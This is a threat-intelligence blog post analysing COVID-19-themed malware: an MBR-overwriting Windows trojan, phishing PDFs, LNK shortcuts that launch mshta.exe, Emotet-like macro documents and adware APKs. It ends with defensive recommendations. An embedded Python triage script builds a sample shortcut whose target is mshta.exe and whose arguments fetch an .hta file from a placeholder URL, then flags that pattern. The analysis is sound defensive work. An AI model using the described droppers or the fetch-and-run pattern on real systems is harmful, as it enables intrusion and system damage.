In December 2019, COVID-19 was first identified in Wuhan, Hubei Province, China. To date it has had worldwide repercussions, affecting millions of people globally. The pandemic has transformed the lives of people and changed the way we work. On account of the ‘new normal’, organizations worldwide have been compelled to shift to digital means for carrying out their business and sharing critical information. With the adoption of working remotely, businesses are met with critical cybersecurity challenges involving data protection and cloud computing.
The current work-from-home situation has emerged as an opportunity for cybercriminals. When employees and their devices leave the physical boundaries of the office network, they are more susceptible to cyber risks. In addition, attackers are increasingly exploiting the COVID-19 crisis to design customized cyberattack campaigns, including phishing and malware attacks with the pandemic as the threat vector. Since the onset of the pandemic, there has been a marked rise in threat actors sending tailor-made emails containing information related to the virus. These emails contain legitimate-looking information and often ask victims to click on a link. The attackers also use other tactics to redirect their targets to malicious domains that can be further used for launching malware attacks.
With criminal groups increasingly launching COVID-19-themed malware campaigns, the Cyble Research Team has been analyzing a number of them. Our research indicates that attackers are using different attack vectors, including malicious PDF files, malware embedded in LNK files, Android malware, and malicious executables presented as documents related to COVID-19. The case studies discussed below present detailed information on these attacks.
CASE 1: Covid-21 Windows Malware
On performing the static analysis of the PE executable file, we found that the application name is shown as “Covid-21 corona virus”.

Figure 1: Product Info given in file properties.
The description contained an interesting string, so we ran the sample in a virtual environment. The file was found to be packed with UPX, and its timestamp was set to the year 2010.

Figure 2: Static information of the malware sample.
It was interesting to note that the sample shows a pop-up alert as soon as it is executed, as shown in the image below.

Figure 3: Alert message after clicking malware sample.
Alongside the pop-up alert shown in Figure 3, the malware sample also drops multiple files in the AppData folder.

Figure 4: Malware helper files dropped in Temp folder.
On selecting “Yes” in the pop-up alert shown in Figure 3, the batch file dropped as Covid21 (Figure 4) carries out the primary infection process. The analyzed batch file code is shown in the image below.

Figure 5: Covid21.bat file performing various malware operations.
The Covid21.bat file creates a folder “Covid21”, as seen in Figure 5, and moves all the helper files into it. The batch file also executes the other malware helper files, disables Task Manager and Windows Defender, and changes the wallpaper, all through registry entries. The Covid21.bat file also modifies the Master Boot Record (MBR), which holds the partition information for the hard drive. The batch installer tries to overwrite the MBR with its own code to lock users out of their system. The execution of PayloadMBR.exe can be seen in the image below.

Figure 6: Execution of the PayloadMBR binary and alert message boxes.
Upon execution of the malware, the wallpaper is modified, and multiple message boxes are displayed on the home screen stating that the computer has been infected with Covid-21 Corona Virus, as seen in the image below.

Figure 7: Changed home screen and message boxes shown after execution of the malware.
The malware claims to be a Trojan, but its primary aim appears to be locking the bootloader and forcing a shutdown. After a short interval, a blue screen appears on the desktop stating that the system has crashed.

Figure 8: Error message displayed after the execution of the malware.
This sample complicates the analysis process by crashing the Windows kernel. On restarting the system, the message shown in the image below appears:

Figure 9: Display screen on restarting the system.
CASE 2: Malicious PDF documents
In the course of our research, we have seen PDF documents being shared by threat actors through phishing campaigns. Attackers send documents containing information on COVID-19, tailored to look like legitimate documents sent from verified sources. The image below is a snapshot of one such malicious PDF document, related to COVID-19 testing results:

Figure 10: Malicious document related to Covid.

Figure 11: PDF reCAPTCHA redirecting to malicious URLs.
The document asks victims for a reCAPTCHA verification. On clicking the checkbox, the document redirects unsuspecting users to a malicious domain.

Figure 12: Redirected Domain
The domain to which users are redirected was inactive at the time of our analysis. Such malicious domains are used for financial gain or for delivering malicious payloads to the victim’s system. The COVID-19-related document has hardcoded links to various fake documents that are part of the same malware campaign. On clicking these links, the user is redirected to other malicious domains.

Figure 13: Links embedded in Covid related document.
Threat actors are also using social engineering techniques and phishing campaigns to lure victims into opening these malicious documents.
CASE 3: LNK Malware
Recently, there has been significant growth in the number of malware attacks using shortcut files. Threat actors often use phishing emails containing a link to download malicious shortcut files, or embed the LNK files directly as attachments. Our research indicates that attackers have been using filenames related to COVID-19 vaccination as a cover to lure targets into opening these malicious LNK files.

On further analysis of one such file, we observed that the LNK file contains a path to the target executable. In our sample, the attackers used “mshta.exe”, which is used for opening HTML applications on Windows systems.

Attackers use mshta.exe to execute malicious “.hta”, JavaScript or VBScript files directly. Because mshta runs outside the scope of Internet browsers, this execution bypasses browser security settings. We found some interesting strings while analyzing the LNK sample:

Figure 14: Structure & Contents of LNK File
The “Long filename” field stores the information based on which the target executable will be used by the LNK file. A relative path to the executable is also given in “Relative Path (UNICODE)”. The “Arguments” string contains the URL of the malicious file, which is executed using mshta.exe. On successful execution of the LNK file, the malicious URL loads the malware onto the victim’s system.
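The fields described above (Relative Path, Arguments) live in the StringData section of the MS-SHLLINK format, so an analyst can pull them out without launching the shortcut. The following is an added triage example, not code from the Cyble post; it constructs its own minimal .lnk fixture (the URL is a placeholder, not one of the post's indicators), parses the StringData fields, and flags the mshta.exe-plus-URL combination the post describes.

```python
import re
import struct

# LinkFlags bits from the MS-SHLLINK specification (section 2.1.1).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields appear in this fixed order, each gated by its own flag bit.
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

def build_lnk(relative_path, arguments):
    """Constructed test fixture: a minimal Unicode .lnk carrying only RelativePath and Arguments."""
    flags = 0x08 | 0x20 | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags).ljust(0x4C, b"\x00")  # rest of header zeroed
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")  # CountCharacters + UTF-16LE chars
    return header + sd(relative_path) + sd(arguments)

def parse_lnk(data):
    """Return the StringData fields of a shell link, skipping the IDList and LinkInfo blocks."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) followed by the item IDs
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (4 bytes) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1   # UTF-16LE or ANSI code page
        raw = data[off:off + count * width]
        off += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields

def triage(fields):
    """Flag the pattern from the post: the target resolves to mshta.exe and Arguments carries a URL."""
    target = fields.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    urls = re.findall(r"https?://\S+", fields.get("arguments", ""))
    return target == "mshta.exe" and bool(urls), urls

# Constructed sample; the URL is a placeholder, not an indicator from the post.
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe", "http://placeholder.invalid/vaccine.hta")
```

Real samples usually also carry a LinkTargetIDList (where the “Long filename” lives); the parser skips that block by its declared size, so the StringData offsets still line up.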
CASE 4: Malicious Word document
Attackers are leveraging the COVID-19 crisis to share malware-embedded documents. In one instance, we found a Word document disguised as a COVID-19 report. Our research indicates that these documents often contain legitimate-looking information on the pandemic while embedding malicious macros that deliver the malware payload to the victim’s system. We analyzed one such document, as shown below.


Figure 15: Warning related to Macros
The initial analysis of the document shows suspicious indicators. For instance, the document contains an “AutoExec” macro, which runs automatically when the document is opened, so the victim has no knowledge of the macros running in the background. We also found other suspicious behaviors, as shown below.

Figure 16: Presence of a large number of Macros inside document

The document also contains hex-encoded strings. On decoding and filtering one of these functions, we found that it executes a PowerShell command, as shown below.

Figure 17: PowerShell script downloading malware payload.
The network details also show the document sending a GET request to a C&C server to download the payload.

The infection mechanism resembles that of the Emotet malware, and the C&C server is also a known malicious domain associated with Emotet.
CASE 5: APK Malware
We have analyzed various APK samples related to COVID-19. Most of the samples were found to be part of adware campaigns for monetization. Threat actors use applications based on COVID-related news to lure unsuspecting users into installing these apps.
As shown in Figure 18, the attacker designed the application to ask users to install other third-party applications or load ads in order to unlock the app’s content:

Figure 18: APK Homepage
On performing static analysis, we found that the app’s main activity starts with the onCreate method. The method then calls a web-creation function, which loads the WebView of the app store or of ads referenced from other classes, as shown in Figure 19.

Figure 19: WebView page of the apps with user intent
We also found that the application contains multiple encrypted strings, which are decrypted with AES by the decryptString function, as shown in the image below. These encrypted strings could be the URLs of the applications or ad files shown in Figure 20.

Figure 20: Encrypted strings called according to the thread.

Figure 21: Encryption technique used within the app.
The application is built using multiple SDKs, such as Flurry and the Google Ads SDK, which developers commonly use to load ads for monetization.

Figure 22: Ads SDK used within the app.
This application was found to be distributed under different names across Android app stores. Its main goal was monetary gain, achieved by luring users into installing other applications.
We have found multiple malware samples related to COVID-19 being distributed in the wild. To protect your systems against these malware attacks, please follow the recommendations shared below.
Indicators of Compromise (IOCs):
SHA-256 Hashes
Recommendations:
Organizations should implement the following practices to strengthen the security posture of their systems.
- Check for instances of standard executables executing with the hash of another process.
- Implement multi-factor authentication (MFA), especially for privileged accounts.
- Use separate administrative accounts on different administration workstations.
- Employ Local Administrator Password Solution (LAPS).
- Allow the least privilege to employees on data access.
- Use MFA to secure Remote Desktop Protocol (RDP) and “jump boxes” for access.
- Secure your endpoints by deploying and maintaining endpoint defense tools.
- Always keep all software up to date.
- Keep antivirus signatures and engines up to date.
- Avoid adding users to the local administrator group unless required.
- Implement a strong password policy and enforce regular password changes.
- Configure a personal firewall on organization workstations to deny unwanted connection requests.
- Deactivate unnecessary services on organization workstations and servers.
About Cyble:
Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrime and exposure on the dark web. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups to Watch in 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com.